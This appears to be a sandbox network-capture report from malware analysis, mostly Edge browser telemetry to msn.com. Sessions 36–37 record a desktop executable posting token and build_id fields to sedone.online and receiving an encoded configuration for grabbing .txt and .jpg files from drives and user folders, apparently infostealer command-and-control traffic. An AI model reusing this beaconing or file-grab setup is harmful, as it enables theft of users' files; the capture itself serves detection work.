                                                                                                                                                                                                                                                X-Amz-Cf-Pop: JFK52-P1
                                                                                                                                                                                                                                                X-Amz-Cf-Id: T1zNWA466VlayLKSX8GRaOpMmC3kdur_JvHpc18MAWW74E1irR8YFg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.7 | 49917 | 13.69.239.72 | 443 | 5088 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:20 UTC | 1082 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734365264026&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 3811
                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                Cookie: _C_ETH=1; USRLOC=; MUID=360240197938679F2CDC554E78216658; _EDGE_S=F=1&SID=06106C5D388F6449242F790A39256585; _EDGE_V=1
2024-12-16 14:40:20 UTC | 3811 | OUT | Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-16T16:07:44.021Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"84149a19-0249-43fb-89ad-f28da6106f7b","epoch":"118553728"},"app":{"locale"
2024-12-16 14:40:21 UTC | 894 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=628addd364d544158ecfe88b1db7f63b&HASH=628a&LV=202412&V=4&LU=1734360020728; Domain=.microsoft.com; Expires=Tue, 16 Dec 2025 14:40:20 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                Set-Cookie: MS0=43070b31d739452485dbe2f9b0962537; Domain=.microsoft.com; Expires=Mon, 16 Dec 2024 15:10:20 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                time-delta-millis: -5243298
                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:20 GMT
                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.7 | 49930 | 20.110.205.119 | 443 | 5088 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:21 UTC | 1261 | OUT | GET /c.gif?rnd=1734365264027&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=14874f7f2a824b9dbbfbe14fe01fe973&activityId=14874f7f2a824b9dbbfbe14fe01fe973&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=B76581ECD2E1499D95A0E1CBD8614B37&MUID=360240197938679F2CDC554E78216658 HTTP/1.1
                                                                                                                                                                                                                                                Host: c.msn.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=360240197938679F2CDC554E78216658; _EDGE_S=F=1&SID=06106C5D388F6449242F790A39256585; _EDGE_V=1; SM=T
2024-12-16 14:40:21 UTC | 982 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                                                                Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                Set-Cookie: MUID=360240197938679F2CDC554E78216658; domain=.msn.com; expires=Sat, 10-Jan-2026 14:40:21 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                Set-Cookie: SRM_M=360240197938679F2CDC554E78216658; domain=c.msn.com; expires=Sat, 10-Jan-2026 14:40:21 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                Set-Cookie: MR=0; domain=c.msn.com; expires=Mon, 23-Dec-2024 14:40:21 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Mon, 16-Dec-2024 14:50:21 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:21 GMT
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Content-Length: 42
2024-12-16 14:40:21 UTC | 42 | IN | Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                Data Ascii: GIF89a!,L;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.7 | 49937 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:22 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----DBA168GLN7QIEUAAIWBI
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 14:40:22 UTC | 331 | OUT
                                                                                                                                                                                                                                                Data Ascii: ------DBA168GLN7QIEUAAIWBIContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------DBA168GLN7QIEUAAIWBIContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------DBA168GLN7QIEUAAIWBICont
2024-12-16 14:40:23 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:23 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
2024-12-16 14:40:23 UTC | 536 | IN
                                                                                                                                                                                                                                                Data Ascii: 20cZGlzfCVEUklWRV9GSVhFRCVcfCoudHh0LCouanBnLCouanBlZ3w1MHxmYWxzZXwqd2luZG93cyp8cmV8JURSSVZFX1JFTU9WQUJMRSVcfCoudHh0LCouanBnLCouanBlZ3w1MHxmYWxzZXwqd2luZG93cyp8dXN8JVVTRVJQUk9GSUxFJVx8Ki50eHQsKi5qcGcsKi5qcGVnfDUwfGZhbHNlfCp3aW5kb3dzKnxEZWZhdWx0fCVET0NVTU


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.7 | 49950 | 116.203.12.114 | 443 | 2000 | C:\Users\user\Desktop\dZKPE9gotO.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:24 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----YCB1NOPHVKFUAI5XB1VS
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                Content-Length: 1825
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 14:40:24 UTC | 1825 | OUT
                                                                                                                                                                                                                                                Data Ascii: ------YCB1NOPHVKFUAI5XB1VSContent-Disposition: form-data; name="token"2afa0bd343ad19f9200a181fa83489aa------YCB1NOPHVKFUAI5XB1VSContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------YCB1NOPHVKFUAI5XB1VSCont
2024-12-16 14:40:25 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:25 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
2024-12-16 14:40:25 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.7 | 49955 | 13.69.239.72 | 443 | 5088 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:26 UTC | 1043 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734365266521&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 5893
                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=360240197938679F2CDC554E78216658; _EDGE_S=F=1&SID=06106C5D388F6449242F790A39256585; _EDGE_V=1; _C_ETH=1; msnup=
2024-12-16 14:40:26 UTC | 5893 | OUT | Data Ascii: {"name":"MS.News.Web.AppError","time":"2024-12-16T16:07:46.520Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"84149a19-0249-43fb-89ad-f28da6106f7b","epoch":"118553728"},"app":{"locale"
2024-12-16 14:40:26 UTC | 894 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=ef68c465c7924b07acf335c94c0a91e4&HASH=ef68&LV=202412&V=4&LU=1734360026265; Domain=.microsoft.com; Expires=Tue, 16 Dec 2025 14:40:26 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                Set-Cookie: MS0=5df6a74879d646f68ff5dda87e3371c8; Domain=.microsoft.com; Expires=Mon, 16 Dec 2024 15:10:26 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                time-delta-millis: -5240256
                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:25 GMT
                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.7 | 49959 | 13.69.239.72 | 443 | 5088 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:26 UTC | 1044 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734365270083&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 11611
                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=360240197938679F2CDC554E78216658; _EDGE_S=F=1&SID=06106C5D388F6449242F790A39256585; _EDGE_V=1; _C_ETH=1; msnup=
2024-12-16 14:40:26 UTC | 11611 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-16T16:07:50.081Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"84149a19-0249-43fb-89ad-f28da6106f7b","epoch":"118553728"},"app":{"locale"
2024-12-16 14:40:26 UTC | 894 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=4d7951676a0741929e28a19d5dad0013&HASH=4d79&LV=202412&V=4&LU=1734360026575; Domain=.microsoft.com; Expires=Tue, 16 Dec 2025 14:40:26 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                Set-Cookie: MS0=f2ef6acd803d4369b091a4afa9f6bcf3; Domain=.microsoft.com; Expires=Mon, 16 Dec 2024 15:10:26 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                time-delta-millis: -5243508
                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:26 GMT
                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.7 | 49961 | 13.69.239.72 | 443 | 5088 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:26 UTC | 1044 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734365270097&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 32893
                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=360240197938679F2CDC554E78216658; _EDGE_S=F=1&SID=06106C5D388F6449242F790A39256585; _EDGE_V=1; _C_ETH=1; msnup=
2024-12-16 14:40:26 UTC | 16384 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-16T16:07:50.093Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"84149a19-0249-43fb-89ad-f28da6106f7b","epoch":"118553728"},"app":{"locale"
2024-12-16 14:40:26 UTC | 16384 | OUT | Data Ascii: ng&isFREModalBackground=1&startpage=1&PC=U531&ocid=msedgdhp","viewType":"size3column","theme":"light","has3PSearch":false,"isSearchAB":false,"isMonetized":false,"pivot":"","referral":"","dwellTime":0},"browser":{"isMobile":false,"width":1280,"height":984,
2024-12-16 14:40:26 UTC | 125 | OUT | Data Ascii: Self":1,"cdnOrigin":0},"scalars":{"size":779,"cache":0}}}}}},"deviceCapabilities":{"memory":8,"cpu":4,"networkSpeed":"3g"}}}}
2024-12-16 14:40:27 UTC | 894 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=e55b9ac95f7941caa8ef21816e09746e&HASH=e55b&LV=202412&V=4&LU=1734360026795; Domain=.microsoft.com; Expires=Tue, 16 Dec 2025 14:40:26 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                Set-Cookie: MS0=e67d44eca6c34d08b6d7239901ae89d3; Domain=.microsoft.com; Expires=Mon, 16 Dec 2024 15:10:26 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                time-delta-millis: -5243302
                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:26 GMT
                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.7 | 49962 | 13.69.239.72 | 443 | 5088 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:26 UTC | 1033 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734365270898&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 5279
                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=360240197938679F2CDC554E78216658; _EDGE_S=F=1&SID=06106C5D388F6449242F790A39256585; _EDGE_V=1; msnup=
2024-12-16 14:40:26 UTC | 5279 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-16T16:07:50.896Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"84149a19-0249-43fb-89ad-f28da6106f7b","epoch":"118553728"},"app":{"locale"
2024-12-16 14:40:27 UTC | 894 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=57dfb17be3104fa5b0471d0ef59aa8dc&HASH=57df&LV=202412&V=4&LU=1734360027146; Domain=.microsoft.com; Expires=Tue, 16 Dec 2025 14:40:27 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                Set-Cookie: MS0=de308152604947eeb848c4f8c8b720f8; Domain=.microsoft.com; Expires=Mon, 16 Dec 2024 15:10:27 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                time-delta-millis: -5243752
                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 14:40:27 GMT
                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.7 | 49963 | 13.69.239.72 | 443 | 5088 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 14:40:27 UTC | 1033 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734365271077&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 9682
                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
